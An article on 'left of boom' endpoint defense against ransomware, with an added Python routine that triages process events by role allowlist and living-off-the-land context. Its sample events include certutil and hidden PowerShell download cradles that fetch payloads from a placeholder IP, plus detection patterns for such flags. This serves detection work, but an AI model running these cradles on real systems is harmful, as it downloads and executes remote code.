Endpoint security challenge: Stopping ransomware attacks ‘left of boom’

In his memoir “Left of Boom”, former CIA case officer Douglas Laux details his experiences in Afghanistan and the Middle East. The title refers to the U.S. military’s decades-old effort to disrupt insurgent cells before they could build or plant bombs: on the timeline of an attack, “boom” is the detonation, and everything to its left is the window in which it can still be prevented. The phrase is also widely used by law enforcement and first responders when discussing the disruption of terror cells before an attack occurs, and it has a lot of utility in cybersecurity, too.

Consider the concept of left of boom in terms of endpoint security. Endpoint security tools are vigilant at monitoring endpoint activity and can generate alerts when they detect suspicious behavior, but they operate narrowly: they watch for a fixed set of predefined indicators and behaviors. That makes them overzealous in reporting anything that matches those rules, leading to high rates of false positives, while at the same time they can miss adversaries who use a company’s own legitimate tools against it, a technique known as “living off the land” (a signed system utility fetching a file, for example, looks in isolation like ordinary administration).

The result is that security teams are buried in alerts: analysts spend their time chasing false positives while real threats slip through. Security analysts need more high-fidelity alerts and less noise.

Further, because security teams are already strained, they need more help stopping attacks while they are underway. “With this next generation of endpoints, what we’ve seen is that there’s a greater concentration on observation of the [threat] techniques, but not really stopping the threat itself,” said Matt Hickey, vice president of sales engineering at Sophos.

“What we need to do is a layered approach on these devices where we are doing device control and we’re making sure that only critical applications needed for that user are running on that device.”

Most importantly, he said, security teams need tools that stop cyberthreats “left of boom.”

Finding and eliminating cyberattacks left of boom requires proactive measures that can disrupt the attacker before they, or their malware, can do any damage; better still, before the adversary can establish a persistent presence in the environment. To achieve this, Hickey recommends a context-sensitive endpoint defense. In practice that means judging an action not only by which binary ran, but by who ran it, what launched it and what it was told to do, so that a legitimate tool used legitimately is not an alert, while the same tool used to fetch or decode a payload is.
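To make the two points above concrete, here is an added example (written for this page; it is not the article’s code and not a Sophos product): a small Python triage routine that first applies a per-role application allowlist, the “only critical applications needed for that user” control, and then applies context rules to living-off-the-land binaries, so that a signed Windows tool on its own produces no alert but the same tool with a download, decode or evasion flag, or an Office parent, does. The role names, allowlists, regular expressions, paths, addresses and process-creation events are all constructed for the example.

```python
"""Context-sensitive triage of process-creation events.

Two layers, mirroring the article's points: a per-role application allowlist
(block what the user has no business running) and context rules for
living-off-the-land binaries (a signed system tool is noise on its own but a
high-fidelity alert with a download, decode or evasion flag or an Office parent).
Roles, allowlists, patterns and events are constructed for this example.
"""
import re
from dataclasses import dataclass, field

# Windows binaries commonly abused for living off the land (lowercase names).
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "powershell.exe", "wmic.exe", "bitsadmin.exe", "wscript.exe"}

# Parents that should rarely launch a script host or a LOLBin.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# Command-line context that turns a benign tool into a real signal.
CONTEXT_RULES = [
    ("remote-fetch", re.compile(r"-urlcache|downloadstring|downloadfile|/transfer|https?://", re.I)),
    ("decode", re.compile(r"-decode|frombase64string|-enc(odedcommand)?\b", re.I)),
    ("evasion", re.compile(r"-nop\b|-w(indowstyle)?\s+hidden|bypass", re.I)),
]

# Constructed per-role allowlist: what each class of user is expected to run.
ALLOWLIST = {
    "finance": {"excel.exe", "outlook.exe", "winword.exe", "chrome.exe"},
    "it-admin": {"powershell.exe", "cmd.exe", "certutil.exe", "rundll32.exe", "mmc.exe"},
}


@dataclass
class Event:
    user: str
    role: str
    image: str          # full path of the created process
    cmdline: str
    parent_image: str


@dataclass
class Finding:
    user: str
    image: str
    verdict: str        # "allow", "block" or "alert"
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(event: Event) -> Finding:
    name, parent = basename(event.image), basename(event.parent_image)

    # Layer 1: allowlist. Anything the role does not need is stopped before it
    # runs, whether or not it looks malicious; this is the left-of-boom control.
    if name not in ALLOWLIST.get(event.role, set()):
        return Finding(event.user, name, "block",
                       [f"{name} is not in the {event.role} allowlist"])

    # Layer 2: context for allowed LOLBins. The binary alone is not an alert;
    # the combination of binary, flags and parent is.
    reasons = []
    if name in LOLBINS:
        reasons = [label for label, rx in CONTEXT_RULES if rx.search(event.cmdline)]
        if parent in OFFICE_PARENTS:
            reasons.append(f"spawned by {parent}")
    return Finding(event.user, name, "alert" if reasons else "allow", reasons)


# Constructed sample events (paths and IPs are placeholders, not real telemetry).
SAMPLE_EVENTS = [
    Event("alice", "finance", r"C:\Program Files\Microsoft Office\EXCEL.EXE",
          "EXCEL.EXE /e", r"C:\Windows\explorer.exe"),
    # Admin using certutil for its intended purpose: allowed, no alert.
    Event("bob", "it-admin", r"C:\Windows\System32\certutil.exe",
          "certutil -store My", r"C:\Windows\System32\cmd.exe"),
    # Same account, same tool, now fetching a payload: high-fidelity alert.
    Event("bob", "it-admin", r"C:\Windows\System32\certutil.exe",
          "certutil -urlcache -split -f http://198.51.100.7/p.exe p.exe",
          r"C:\Windows\System32\cmd.exe"),
    # Hidden download-cradle PowerShell spawned by Outlook on an admin box.
    Event("bob", "it-admin", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\"",
          r"C:\Program Files\Microsoft Office\OUTLOOK.EXE"),
    # A finance user has no business running PowerShell at all: blocked outright.
    Event("alice", "finance", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -nop -w hidden -enc SQBFAFgA",
          r"C:\Program Files\Microsoft Office\WINWORD.EXE"),
]


def triage_all(events=SAMPLE_EVENTS):
    """Return one Finding per event, in input order."""
    return [triage(e) for e in events]


if __name__ == "__main__":
    for f in triage_all():
        print(f"{f.verdict:5}  {f.user:6} {f.image:15} {'; '.join(f.reasons)}")
```

Run as a script it prints one line per event: the two routine events are allowed with no reasons, the two certutil and PowerShell download cradles are alerted with the context that justified the alert, and the PowerShell launch from the finance account is blocked without any behavioral analysis at all. The ordering is deliberate: the allowlist decision comes first because it needs no judgement about intent and stops the process before it executes, while the context rules handle the residual case of a legitimately allowed tool being misused.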